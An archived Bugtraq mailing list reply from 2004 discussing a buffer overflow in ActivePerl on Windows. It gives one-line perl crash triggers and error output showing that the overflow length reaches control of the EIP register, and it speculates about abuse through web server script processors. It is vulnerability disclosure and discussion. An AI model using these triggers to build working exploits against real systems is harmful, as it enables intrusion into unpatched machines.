Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Buffer Overflow in ActivePerl ?

From: Nick FitzGerald <nick () virus-l demon co uk>
Date: Wed, 19 May 2004 01:29:41 +1200
"Oliver () greyhat de" <Oliver () greyhat de> wrote:


i played around with ActiveState's ActivePerl for Win32, and crashed 
Perl.exe with the following command:

perl -e "$a="A" x 256; system($a)"


Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus 
all but last week's security patch:

   perl -e "$a="A" x 256; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x00657865.  The memory could not be "written".

Also, it is likely exploitable -- push up the number of A's a bit:

   C:\>perl -e "$a="A" x 259; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x65004141.  The memory could not be "written".

and we seem to get control of EIP.  Coincidence?  Try yet two more:

   C:\>perl -e "$a="A" x 261; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x41414141.  The memory could not be "written".

Looks like full control of EIP...

However, there is not likely to be a privilege escalation here unless 
perhaps a script processor on a web server can be cajoled into doing 
something with this??  (Not at all familiar with the innards of Windows 
web servers and their relationship to their CGI, etc processors...)


-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
Previous By Date Next
Previous By Thread Next

Current thread: